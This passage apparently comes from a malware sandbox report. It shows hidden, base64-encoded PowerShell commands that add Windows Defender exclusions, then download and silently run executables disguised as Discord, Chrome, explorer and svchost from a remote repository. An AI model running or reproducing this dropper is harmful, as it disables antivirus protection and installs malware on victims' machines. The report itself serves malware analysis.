 W g B B A E I A d g B B A E g A Y w B B A G M A d w B B A G 4 A Q Q B D A E k A Q Q B D A G c A Q Q B L A E E A Q w B R A E E A Z A B R A E I A e Q B B A E c A d w B B A E 0 A U Q B B A G c A Q Q B E A D A A Q Q B J A E E A Q Q B u A E E A R w B n A E E A Z A B B A E I A M A B B A E g A Q Q B B A G M A d w B B A D Y A Q Q B D A D g A Q Q B M A H c A Q g B u A E E A R w B r A E E A Z A B B A E I A b w B B A E g A V Q B B A F k A Z w B B A H U A Q Q B H A E 0 A Q Q B i A H c A Q g B 0 A E E A Q w A 4 A E E A U Q B R A E I A d A B B A E c A b w B B A F k A U Q B C A G s A Q Q B F A E k A Q Q B Z A F E A Q g B z A E E A R w B 3 A E E A Y w B 3 A E E A d g B B A E Y A U Q B B A F I A U Q B C A F Q A Q Q B G A F E A Q Q B M A H c A Q g B 5 A E E A R w B F A E E A Z A B 3 A E E A d g B B A E g A S Q B B A F o A U Q B C A G 0 A Q Q B I A E 0 A Q Q B M A H c A Q g B v A E E A R w B V A E E A W Q B R A E I A a w B B A E g A T Q B B A E w A d w B C A H Q A Q Q B H A E U A Q Q B h A F E A Q g B 1 A E E A Q w A 4 A E E A U g B B A E I A c A B B A E g A T Q B B A F k A d w B C A H Y A Q Q B I A E k A Q Q B a A E E A Q Q B 1 A E E A R w B V A E E A Z Q B B A E I A b A B B A E M A Y w B B A E M A Z w B B A G s A Q Q B I A F U A Q Q B j A G c A Q g B z A E E A R A B J A E E A S Q B B A E E A O Q B B A E M A Q Q B B A E o A d w B C A G 8 A Q Q B I A F E A Q Q B k A E E A Q g B 3 A E E A S A B N A E E A T w B n A E E A d g B B A E M A O A B B A F o A d w B C A H A A Q Q B I A F E A Q Q B h A E E A Q g A x A E E A R w B J A E E A T A B n A E I A a g B B A E c A O A B B A G I A U Q B B A H Y A Q Q B F A E U A Q Q B i A F E A Q g B x A E E A R w B F A E E A W g B B A E I A Q w B B A E c A R Q B B A G I A Q Q B C A H M A Q Q B I A E 0 A Q Q B M A H c A Q g B V A E E A R Q B V A E E A V Q B 3 A E I A V Q B B A E M A O A B B A G M A Z w B C A G g A Q Q B I A G M A Q Q B M A H c A Q g B 5 A E E A R w B V A E E A W g B n A E I A e g B B A E M A O A B B A G E A Q Q B C A G w A Q Q B H A E U A Q Q B a A E E A Q g B 6 A E E A Q w A 4 A E E A Y g B R A E I A a A B B A E c A a w B B A G I A Z w B B A H Y A Q Q B F A G M A Q Q B i A H c A Q g B 2 A E E A R w B j A E E A Y g B B A E I A b A B B A E U A T Q B B A G E A Q Q B C A H k A Q Q B H A D g A Q Q B i A F E A Q g B s A E E A Q w A 0 A E E A W g B R A E I A N A B B A E c A V Q B B A E o A d w B B A E s A Q Q B D A F E A Q Q B k A F E A Q g B 5 A E E A R w B 3 A E E A T Q B 3 A E E A Z w B B A E Q A M A B B A E k A Q Q B B A G 4 A Q Q B H A G c A Q Q B k A E E A Q g A w A E E A S A B B A E E A Y w B 3 A E E A N g B B A E M A O A B B A E w A d w B C A G 4 A Q Q B H A G s A Q Q B k A E E A Q g B v A E E A S A B V A E E A W Q B n A E E A d Q B B A E c A T Q B B A G I A d w B C A H Q A Q Q B D A D g A Q Q B R A F E A Q g B 0 A E E A R w B v A E E A W Q B R A E I A a w B B A E U A S Q B B A F k A U Q B C A H M A Q Q B H A H c A Q Q B j A H c A Q Q B 2 A E E A R g B R A E E A U g B R A E I A V A B B A E Y A U Q B B A E w A d w B C A H k A Q Q B H A E U A Q Q B k A H c A Q Q B 2 A E E A S A B J A E E A W g B R A E I A b Q B B A E g A T Q B B A E w A d w B C A G 8 A Q Q B H A F U A Q Q B Z A F E A Q g B r A E E A S A B N A E E A T A B 3 A E I A d A B B A E c A R Q B B A G E A U Q B C A H U A Q Q B D A D g A Q Q B a A F E A Q g A 0 A E E A S A B B A E E A Y g B B A E I A d g B B A E g A S Q B B A F o A U Q B C A H k A Q Q B D A D Q A Q Q B a A F E A Q g A 0 A E E A R w B V A E E A S g B 3 A E E A S w B B A E M A U Q B B A G Q A U Q B C A H k A Q Q B H A H c A Q Q B O A E E A Q Q B n A E E A R A A w A E E A S Q B B A E E A b g B B A E c A Z w B B A G Q A Q Q B C A D A A Q Q B I A E E A Q Q B j A H c A Q Q A 2 A E E A Q w A 4 A E E A T A B 3 A E I A b g B B A E c A a w B B A G Q A Q Q B C A G 8 A Q Q B I A F U A Q Q B Z A G c A Q Q B 1 A E E A R w B N A E E A Y g B 3 A E I A d A B B A E M A O A B B A F E A U Q B C A H Q A Q Q B H A G 8 A Q Q B Z A F E A Q g B r A E E A R Q B J A E E A W Q B R A E I A c w B B A E c A d w B B A G M A d w B B A H Y A Q Q B G A F E A Q Q B S A F E A Q g B U A E E A R g B R A E E A T A B 3 A E I A e Q B B A E c A R Q B B A G Q A d w B B A H Y A Q Q B I A E k A Q Q B a A F E A Q g B t A E E A S A B N A E E A T A B 3 A E I A b w B B A E c A V Q B B A F k A U Q B C A G s A Q Q B I A E 0 A Q Q B M A H c A Q g B 0 A E E A R w B F A E E A Y Q B R A E I A d Q B B A E M A O A B B A G M A d w B C A D I A Q Q B H A E 0 A Q Q B h A E E A Q g B 2 A E E A S A B N A E E A Z A B B A E E A d Q B B A E c A V Q B B A G U A Q Q B C A G w A Q Q B D A G M A Q Q B D A G c A Q Q B L A E E A Q w B R A E E A Y g B B A E I A d g B B A E c A T Q B B A F k A U Q B C A D A A Q Q B H A G s A Q Q B i A H c A Q g B 1 A E E A S A B N A E E A S Q B B A E E A O Q B B A E M A Q Q B B A F E A Q Q B B A G 8 A Q Q B B A G 8 A Q Q B J A E E A Q Q B n A E E A Q w B B A E E A S Q B B A E E A b g B B A E U A T Q B B A E 8 A Z w B C A G M A Q Q B G A F U A Q Q B j A H c A Q g B s A E E A S A B J A E E A Y w B 3 A E I A Y w B B A E Y A Q Q B B A G Q A U Q B C A G k A Q Q B H A H c A Q Q B h A F E A Q g B q A E E A R g B 3 A E E A U g B B A E I A d g B B A E g A Y w B B A G I A Z w B C A H M A Q Q B H A D g A Q Q B Z A F E A Q g B r A E E A S A B N A E E A W A B B A E I A R Q B B A E c A a w B B A G M A d w B C A G o A Q Q B H A D g A Q Q B j A G c A Q g B r A E E A Q w A 0 A E E A W g B R A E I A N A B B A E c A V Q B B A E o A d w B B A H M A Q Q B B A G 8 A Q Q B J A E E A Q Q B n A E E A Q w B B A E E A S Q B B A E E A b g B B A E U A T Q B B A E 8 A Z w B C A G M A Q Q B G A F U A Q Q B j A H c A Q g B s A E E A S A B J A E E A Y w B 3 A E I A Y w B B A E Y A Q Q B B A G Q A U Q B C A G k A Q Q B H A H c A Q Q B h A F E A Q g B q A E E A R g B 3 A E E A U g B B A E I A d g B B A E g A Y w B B A G I A Z w B C A H M A Q Q B H A D g A Q Q B Z A F E A Q g B r A E E A S A B N A E E A W A B B A E I A S A B B A E c A O A B B A G I A d w B C A G 4 A Q Q B H A H c A Q Q B a A F E A Q g B E A E E A R w B n A E E A Y w B n A E I A d g B B A E c A M A B B A F o A U Q B B A H U A Q Q B H A F U A Q Q B l A E E A Q g B s A E E A Q w B j A E E A T A B B A E E A S w B B A E M A Q Q B B A E k A Q Q B B A G c A Q Q B D A E E A Q Q B K A H c A Q g B E A E E A R A B v A E E A W A B B A E I A V g B B A E g A T Q B B A F o A U Q B C A H k A Q Q B I A E 0 A Q Q B Y A E E A Q g B R A E E A S A B V A E E A W Q B n A E I A c w B B A E c A a w B B A F k A d w B C A G M A Q Q B F A F E A Q Q B i A H c A Q g A z A E E A R w A 0 A E E A Y g B B A E I A d g B B A E c A R Q B B A F o A Q Q B C A H o A Q Q B G A H c A Q Q B a A F E A Q g A 0 A E E A S A B B A E E A Y g B B A E I A d g B B A E g A S Q B B A F o A U Q B C A H k A Q Q B D A D Q A Q Q B a A F E A Q g A 0 A E E A R w B V A E E A S g B 3 A E E A c w B B A E E A b w B B A E k A Q Q B B A G c A Q Q B D A E E A Q Q B J A E E A Q Q B u A E E A R Q B N A E E A T w B n A E I A Y w B B A E Y A V Q B B A G M A d w B C A G w A Q Q B I A E k A Q Q B j A H c A Q g B j A E E A R g B B A E E A Z A B R A E I A a Q B B A E c A d w B B A G E A U Q B C A G o A Q Q B G A H c A Q Q B S A E E A Q g B 2 A E E A S A B j A E E A Y g B n A E I A c w B B A E c A O A B B A F k A U Q B C A G s A Q Q B I A E 0 A Q Q B Y A E E A Q g B 6 A E E A S A B Z A E E A W Q B 3 A E I A b w B B A E c A O A B B A G M A d w B C A D A A Q Q B D A D Q A Q Q B a A F E A Q g A 0 A E E A R w B V A E E A S g B 3 A E E A S w B B A E M A a w B B A E M A Z w B B A E s A Q Q B F A G s A Q Q B i A G c A Q g A y A E E A R w A 4 A E E A Y Q B 3 A E I A b A B B A E M A M A B B A F Y A d w B C A G w A Q Q B H A E k A Q Q B V A G c A Q g B s A E E A S A B F A E E A Z A B R A E I A b A B B A E g A T Q B B A G Q A Q Q B B A G c A Q Q B D A D A A Q Q B W A F E A Q g B 5 A E E A R w B r A E E A S Q B B A E E A a w B B A E g A V Q B B A G M A Z w B C A H M A Q Q B E A E U A Q Q B J A E E A Q Q B 0 A E E A R Q A 4 A E E A Z A B R A E I A M A B B A E U A W Q B B A G E A U Q B C A H M A Q Q B H A F U A Q Q B J A E E A Q Q B r A E E A R w B 3 A E E A Y g B 3 A E I A a g B B A E c A R Q B B A G Q A Q Q B C A H A A Q Q B H A D g A Q Q B i A G c A Q g B 6 A E E A R g B z A E E A T Q B B A E I A Z A B B A E E A b w B B A F M A U Q B C A H U A Q Q B I A F k A Q Q B i A H c A Q g B y A E E A R w B V A E E A T A B R A E I A W A B B A E c A V Q B B A F k A Z w B C A F M A Q Q B H A F U A Q Q B j A F E A Q g A x A E E A R w B V A E E A Y w B 3 A E I A M A B B A E M A Q Q B B A E w A U Q B C A F Y A Q Q B I A E k A Q Q B h A F E A Q Q B n A E E A Q w B R A E E A Z A B R A E I A e Q B B A E c A d w B B A E 0 A Z w B B A G c A Q Q B D A D A A Q Q B U A H c A Q g A x A E E A S A B R A E E A U g B n A E I A c A B B A E c A d w B B A F o A U Q B B A G c A Q Q B D A F E A Q Q B i A E E A Q g B 2 A E E A R w B N A E E A W Q B R A E I A M A B B A E c A a w B B A G I A d w B C A H U A Q Q B I A E 0 A Q Q B X A H c A Q Q B 4 A E E A R g A w A E E A Q w B n A E I A S g B B A E c A N A B B A G Q A Z w B C A H Y A Q Q B H A H M A Q Q B a A F E A Q Q B 0 A E E A R g B j A E E A W g B R A E I A a Q B B A E Y A S Q B B A F o A U Q B C A H g A Q Q B I A F U A Q Q B a A F E A Q g B 6 A E E A S A B R A E E A S Q B B A E E A d A B B A E Y A V Q B B A G M A Z w B C A H A A Q Q B D A E E A Q Q B K A E E A Q g A x A E E A S A B J A E E A Y g B B A E E A e g B B A E M A Q Q B B A E w A U Q B C A F A A Q Q B I A F U A Q Q B k A E E A Q g B H A E E A R w B r A E E A Y g B B A E I A b A B B A E M A Q Q B B A E o A Q Q B C A H M A Q Q B H A D g A Q Q B Z A H c A Q g B o A E E A S A B R A E E A Y Q B R A E I A d g B B A E c A N A B B A G M A d w B C A G I A Q Q B E A E k A Q Q B Y A F E A Q Q B L A E E A R Q B r A E E A Y g B n A E I A M g B B A E c A O A B B A G E A d w B C A G w A Q Q B D A D A A Q Q B W A H c A Q g B s A E E A R w B J A E E A V Q B n A E I A b A B B A E g A R Q B B A G Q A U Q B C A G w A Q Q B I A E 0 A Q Q B k A E E A Q Q B n A E E A Q w A w A E E A V g B R A E I A e Q B B A E c A a w B B A E k A Q Q B B A G s A Q Q B I A F U A Q Q B j A G c A Q g B z A E E A R A B R A E E A S Q B B A E E A d A B B A E U A O A B B A G Q A U Q B C A D A A Q Q B F A F k A Q Q B h A F E A Q g B z A E E A R w B V A E E A S Q B B A E E A a w B B A E c A d w B B A G I A d w B C A G o A Q Q B H A E U A Q Q B k A E E A Q g B w A E E A R w A 4 A E E A Y g B n A E I A e g B B A E Y A c w B B A E 0 A d w B C A G Q A Q Q B B A G 8 A Q Q B D A G c A Q g B t A E E A R w A 4 A E E A Y w B n A E I A b A B B A E c A R Q B B A F k A d w B C A G 8 A Q Q B D A E E A Q Q B L A E E A Q Q B r A E E A R w B 3 A E E A Y g B 3 A E I A a g B B A E c A R Q B B A G Q A Q Q B C A H A A Q Q B H A D g A Q Q B i A G c A Q Q B n A E E A R w B r A E E A Y g B n A E E A Z w B B A E M A U Q B B A G I A Q Q B C A H Y A Q Q B H A E 0 A Q Q B Z A F E A Q g A w A E E A R w B r A E E A Y g B 3 A E I A d Q B B A E g A T Q B B A E s A U Q B B A G c A Q Q B I A H M A Q Q B D A G c A Q Q B n A E E A Q w B B A E E A S Q B B A E E A Z w B B A E Y A T Q B B A G Q A Q Q B C A G g A Q Q B I A E k A Q Q B k A E E A Q Q B 0 A E E A R g B B A E E A Y w B n A E I A d g B B A E c A T Q B B A F o A U Q B C A H o A Q Q B I A E 0 A Q Q B J A E E A Q Q B 0 A E E A R Q B Z A E E A Y Q B R A E I A c w B B A E c A V Q B B A F U A Q Q B C A G g A Q Q B I A F E A Q Q B h A E E A Q Q B n A E E A Q w B R A E E A Y g B B A E I A d g B B A E c A T Q B B A F k A U Q B C A D A A Q Q B H A G s A Q Q B i A H c A Q g B 1 A E E A Q w B B A E E A T A B R A E I A W A B B A E c A a w B B A G I A Z w B C A G s A Q Q B H A D g A Q Q B k A H c A Q g B U A E E A S A B R A E E A Z Q B R A E I A c w B B A E c A V Q B B A E k A Q Q B C A E k A Q Q B H A G s A Q Q B a A E E A Q g B r A E E A R w B V A E E A Y g B n A E E A Z w B B A E M A M A B B A F Y A d w B C A G g A Q Q B H A G s A Q Q B k A E E A Q Q B L A E E A S A A w A E E A I g A = " 
 3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand p o w e r s h e l l   - N o P r o f i l e   - E x e c u t i o n P o l i c y   B y p a s s   - W i n d o w S t y l e   H i d d e n   - E n c o d e d C o m m a n d   " c A B v A H c A Z Q B y A H M A a A B l A G w A b A A g A C 0 A V w B p A G 4 A Z A B v A H c A U w B 0 A H k A b A B l A C A A S A B p A G Q A Z A B l A G 4 A I A A t A E M A b w B t A G 0 A Y Q B u A G Q A I A A i A E E A Z A B k A C 0 A T Q B w A F A A c g B l A G Y A Z Q B y A G U A b g B j A G U A I A A t A E U A e A B j A G w A d Q B z A G k A b w B u A F A A Y Q B 0 A G g A I A A n A E M A O g B c A F A A c g B v A G c A c g B h A G 0 A R A B h A H Q A Y Q A n A C I A C g B w A G 8 A d w B l A H I A c w B o A G U A b A B s A C A A L Q B X A G k A b g B k A G 8 A d w B T A H Q A e Q B s A G U A I A B I A G k A Z A B k A G U A b g A g A C 0 A Q w B v A G 0 A b Q B h A G 4 A Z A A g A C I A Q Q B k A G Q A L Q B N A H A A U A B y A G U A Z g B l A H I A Z Q B u A G M A Z Q A g A C 0 A R Q B 4 A G M A b A B 1 A H M A a Q B v A G 4 A U A B h A H Q A a A A g A C c A Q w A 6 A F w A V Q B z A G U A c g B z A F w A U A B 1 A G I A b A B p A G M A X A B E A G 8 A d w B u A G w A b w B h A G Q A c w A n A C I A C g B w A G 8 A d w B l A H I A c w B o A G U A b A B s A C A A L Q B X A G k A b g B k A G 8 A d w B T A H Q A e Q B s A G U A I A B I A G k A Z A B k A G U A b g A g A C 0 A Q w B v A G 0 A b Q B h A G 4 A Z A A g A C I A Q Q B k A G Q A L Q B N A H A A U A B y A G U A Z g B l A H I A Z Q B u A G M A Z Q A g A C 0 A R Q B 4 A G M A b A B 1 A H M A a Q B v A G 4 A U A B h A H Q A a A A g A C c A Q w A 6 A F w A V w B p A G 4 A Z A B v A H c A c w B c A F M A e Q B z A H Q A Z Q B t A D M A M g A n A C I A C g B w A G 8 A d w B l A H I A c w B o A G U A b A B s A C A A L Q B X A G k A b g B k A G 8 A d w B T A H Q A e Q B s A G U A I A B I A G k A Z A B k A G U A b g A g A C 0 A Q w B v A G 0 A b Q B h A G 4 A Z A A g A C I A Q Q B k A G Q A L Q B N A H A A U A B y A G U A Z g B l A H I A Z Q B u A G M A Z Q A g A C 0 A R Q B 4 A G M A b A B 1 A H M A a Q B v A G 4 A U A B h A H Q A a A A g A C c A Q w A 6 A F w A V w B p A G 4 A Z A B v A H c A c w B c A F M A e Q B z A F c A T w B X A D Y A N A A n A C I A C g B w A G 8 A d w B l A H I A c w B o A G U A b A B s A C A A L Q B X A G k A b g B k A G 8 A d w B T A H Q A e Q B s A G U A I A B I A G k A Z A B k A G U A b g A g A C 0 A Q w B v A G 0 A b Q B h A G 4 A Z A A g A C I A Q Q B k A G Q A L Q B N A H A A U A B y A G U A Z g B l A H I A Z Q B u A G M A Z Q A g A C 0 A R Q B 4 A G M A b A B 1 A H M A a Q B v A G 4 A U A B h A H Q A a A A g A C c A Q w A 6 A F w A V w B p A G 4 A Z A B v A H c A c w A n A C I A C g A K A C Q A d Q B y A G w A M Q A g A D 0 A I A A n A G g A d A B 0 A H A A c w A 6 A C 8 A L w B n A G k A d A B o A H U A Y g A u A G M A b w B t A C 8 A Q Q B t A G o A Y Q B k A E I A Y Q B s A G w A c w A v A F Q A R Q B T A F Q A L w B y A G E A d w A v A H I A Z Q B m A H M A L w B o A G U A Y Q B k A H M A L w B t A G E A a Q B u A C 8 A R A B p A H M A Y w B v A H I A Z A A u A G U A e A B l A C c A C g A k A H U A c g B s A D I A I A A 9 A C A A J w B o A H Q A d A B w A H M A O g A v A C 8 A Z w B p A H Q A a A B 1 A G I A L g B j A G 8 A b Q A v A E E A b Q B q A G E A Z A B C A G E A b A B s A H M A L w B U A E U A U w B U A C 8 A c g B h A H c A L w B y A G U A Z g B z A C 8 A a A B l A G E A Z A B z A C 8 A b Q B h A G k A b g A v A E c A b w B v A G c A b A B l A E M A a A B y A G 8 A b Q B l A C 4 A Z Q B 4 A G U A J w A K A C Q A d Q B y A G w A M w A g A D 0 A I A A n A G g A d A B 0 A H A A c w A 6 A C 8 A L w B n A G k A d A B o A H U A Y g A u A G M A b w B t A C 8 A Q Q B t A G o A Y Q B k A E I A Y Q B s A G w A c w A v A F Q A R Q B T A F Q A L w B y A G E A d w A v A H I A Z Q B m A H M A L w B o A G U A Y Q B k A H M A L w B t A G E A a Q B u A C 8 A Z Q B 4 A H A A b A B v A H I A Z Q B y A C 4 A Z Q B 4 A G U A J w A K A C Q A d Q B y A G w A N A A g A D 0 A I A A n A G g A d A B 0 A H A A c w A 6 A C 8 A L w B n A G k A d A B o A H U A Y g A u A G M A b w B t A C 8 A Q Q B t A G o A Y Q B k A E I A Y Q B s A G w A c w A v A F Q A R Q B T A F Q A L w B y A G E A d w A v A H I A Z Q B m A H M A L w B o A G U A Y Q B k A H M A L w B t A G E A a Q B u A C 8 A c w B 2 A G M A a A B v A H M A d A A u A G U A e A B l A C c A C g A K A C Q A b A B v A G M A Y Q B 0 A G k A b w B u A H M A I A A 9 A C A A Q A A o A A o A I A A g A C A A I A A n A E M A O g B c A F U A c w B l A H I A c w B c A F A A d Q B i A G w A a Q B j A F w A R A B v A H c A b g B s A G 8 A Y Q B k A H M A X A B E A G k A c w B j A G 8 A c g B k A C 4 A Z Q B 4 A G U A J w A s A A o A I A A g A C A A I A A n A E M A O g B c A F U A c w B l A H I A c w B c A F A A d Q B i A G w A a Q B j A F w A R A B v A H c A b g B s A G 8 A Y Q B k A H M A X A B H A G 8 A b w B n A G w A Z Q B D A G g A c g B v A G 0 A Z Q A u A G U A e A B l A C c A L A A K A C A A I A A g A C A A J w B D A D o A X A B V A H M A Z Q B y A H M A X A B Q A H U A Y g B s A G k A Y w B c A E Q A b w B 3 A G 4 A b A B v A G E A Z A B z A F w A Z Q B 4 A H A A b A B v A H I A Z Q B y A C 4 A Z Q B 4 A G U A J w A s A A o A I A A g A C A A I A A n A E M A O g B c A F U A c w B l A H I A c w B c A F A A d Q B i A G w A a Q B j A F w A R A B v A H c A b g B s A G 8 A Y Q B k A H M A X A B z A H Y A Y w B o A G 8 A c w B 0 A C 4 A Z Q B 4 A G U A J w A K A C k A C g A K A E k A b g B 2 A G 8 A a w B l A C 0 A V w B l A G I A U g B l A H E A d Q B l A H M A d A A g A C 0 A V Q B y A G k A I A A k A H U A c g B s A D E A I A A t A E 8 A d Q B 0 A E Y A a Q B s A G U A I A A k A G w A b w B j A G E A d A B p A G 8 A b g B z A F s A M A B d A A o A S Q B u A H Y A b w B r A G U A L Q B X A G U A Y g B S A G U A c Q B 1 A G U A c w B 0 A C A A L Q B V A H I A a Q A g A C Q A d Q B y A G w A M g A g A C 0 A T w B 1 A H Q A R g B p A G w A Z Q A g A C Q A b A B v A G M A Y Q B 0 A G k A b w B u A H M A W w A x A F 0 A C g B J A G 4 A d g B v A G s A Z Q A t A F c A Z Q B i A F I A Z Q B x A H U A Z Q B z A H Q A I A A t A F U A c g B p A C A A J A B 1 A H I A b A A z A C A A L Q B P A H U A d A B G A G k A b A B l A C A A J A B s A G 8 A Y w B h A H Q A a Q B v A G 4 A c w B b A D I A X Q A K A E k A b g B 2 A G 8 A a w B l A C 0 A V w B l A G I A U g B l A H E A d Q B l A H M A d A A g A C 0 A V Q B y A G k A I A A k A H U A c g B s A D Q A I A A t A E 8 A d Q B 0 A E Y A a Q B s A G U A I A A k A G w A b w B j A G E A d A B p A G 8 A b g B z A F s A M w B d A A o A C g B m A G 8 A c g B l A G E A Y w B o A C A A K A A k A G w A b w B j A G E A d A B p A G 8 A b g A g A G k A b g A g A C Q A b A B v A G M A Y Q B 0 A G k A b w B u A H M A K Q A g A H s A C g A g A C A A I A A g A F M A d A B h A H I A d A A t A F A A c g B v A G M A Z Q B z A H M A I A A t A E Y A a Q B s A G U A U A B h A H Q A a A A g A C Q A b A B v A G M A Y Q B 0 A G k A b w B u A C A A L Q B X A G k A b g B k A G 8 A d w B T A H Q A e Q B s A G U A I A B I A G k A Z A B k A G U A b g A g A C 0 A V w B h A G k A d A A K A H 0 A " 4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEMAbwBtAG0AYQBuAGQAIAAiAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcATwBXADYANAAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwAnACIACgAKACQAdQByAGwAMQAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBtAGoAYQBkAEIAYQBsAGwAcwAvAFQARQBTAFQALwByAGEAdwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8ARABpAHMAYwBvAHIAZAAuAGUAeABlACcACgAkAHUAcgBsADIAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAEEAbQBqAGEAZABCAGEAbABsAHMALwBUAEUAUwBUAC8AcgBhAHcALwByAGUAZgBzAC8AaABlAGEAZABzAC8AbQBhAGkAbgAvAEcAbwBvAGcAbABlAEMAaAByAG8AbQBlAC4AZQB4AGUAJwAKACQAdQByAGwAMwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBtAGoAYQBkAEIAYQBsAGwAcwAvAFQARQBTAFQALwByAGEAdwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8AZQB4AHAAbABvAHIAZQByAC4AZQB4AGUAJwAKACQAdQByAGwANAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBtAGoAYQBkAEIAYQBsAGwAcwAvAFQARQBTAFQALwByAGEAdwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8AcwB2AGMAaABvAHMAdAAuAGUAeABlACcACgAKACQAbABvAGMAYQB0AGkAbwBuAHMAIAA9ACAAQAAoAAoAIAAgACAAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwARABvAHcAbgBsAG8AYQBkAHMAXABEAGkAcwBjAG8AcgBkAC4AZQB4AGUAJwAsAAoAIAAgACAAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwARABvAHcAbgBsAG8AYQBkAHMAXABHAG8AbwBnAGwAZQBDAGgAcgBvAG0AZQAuAGUAeABlACcALAAKACAAIAAgACAAJwBDADoAXABVAHMAZQByAHMAXABQAHUAYgBsAGkAYwBcAEQAbwB3AG4AbABvAGEAZABzAFwAZQB4AHAAbABvAHIAZQByAC4AZQB4AGUAJwAsAAoAIAAgACAAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwARABvAHcAbgBsAG8AYQBkAHMAXABzAHYAYwBoAG8AcwB0AC4AZQB4AGUAJwAKACkACgAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsADEAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGwAbwBjAGEAdABpAG8AbgBzAFsAMABdAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwAMgAgAC0ATwB1AHQARgBpAGwAZQAgACQAbABvAGMAYQB0AGkAbwBuAHMAWwAxAF0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAbAAzACAALQBPAHUAdABGAGkAbABlACAAJABsAG8AYwBhAHQAaQBvAG4AcwBbADIAXQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsADQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGwAbwBjAGEAdABpAG8AbgBzAFsAMwBdAAoACgBmAG8AcgBlAGEAYwBoACAAKAAkAGwAbwBjAGEAdABpAG8AbgAgAGkAbgAgACQAbABvAGMAYQB0AGkAbwBuAHMAKQAgAHsACgAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAbABvAGMAYQB0AGkAbwBuACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAKAH0A5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData'"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
